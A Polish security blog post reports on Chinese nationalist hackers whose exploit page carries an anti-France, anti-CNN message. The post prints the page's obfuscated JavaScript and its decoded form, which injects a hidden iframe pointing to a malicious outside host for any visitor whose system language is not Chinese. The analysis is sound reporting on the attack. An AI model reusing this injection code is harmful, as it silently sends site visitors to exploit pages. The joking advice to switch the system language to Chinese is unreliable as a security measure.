Jak się okazuje, hakerzy z Chin nie ustają w swojej walce z kapitalistyczną pomyłką medialną jaką jest CNN, kraj Francja i całe pozostałe resztki świata zwane popularnie NieChinami.
Jakiś czas temu pisaliśmy o planowanych atakach chińczyków na CNN i niechęci wobec Francji.
Bojan Zdrnja z SANS na blogu Internet Storm Center zauważył na jednej ze stron hostujących exploity wymierzone w przeglądarki WWW, dopisany tekst o mniej więcej takiej treści:
This is a mass invasion. Safeguard the motherland's dignity!
FUCK FRANCE! FUCK CNN! I WILL ATTACK you ALWAYS !
I love my motherland!
sorry
Please understand that I
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss117276@163.com
I niby wszystko w porządku bo taki tekst tak naprawdę mógł umieścić każdy, zarówno Francuz jak i pracownik firmy CNN ;], jednak po bardziej szczegółowej analizie okazało się, że strona zawiera coś jeszcze. Mianowicie zamaskowany kod JavaScript:
val(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))}; if(!''.replace(/^/,String)) {while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return[e]}];e=function(){return'\\w+'};c=1}; while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);returnp} ('8(b.e==\'i-2\'){}4{3.g("<9d=7:\/\/h.c.2\/a.6 f=15=0><\/9>");}',62,19,'|100| cn |document|else|height|htm|http|if|iframe|index|navigator| ririwow|src|systemLanguage|width|writeln|www|zh'.split('|'),0,{}))
Po odszyfrowaniu okazało się, że kod zawiera następującą treść:
if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("<iframe src=http://www.ririwow.cn/index.htm" width=100 height=0></iframe>");}
… innymi słowy skrypt sprawdza czy zmienna systemowa odpowiedzialna za język to „zh-cn” i tylko w przypadku jeśli nie używamy chińskich koszulek… przepraszam systemów (a przynajmniej języków)… jesteśmy przekierowywani do strony, która próbuje nas zaatakować :]
Polityka wchodzi na salony. Na salony stricte botnetowe jak widać. Być może zabrzmi to głupio, ale zalecam przestawienie języka na chiński – dla Waszego bezpieczeństwa ;]]]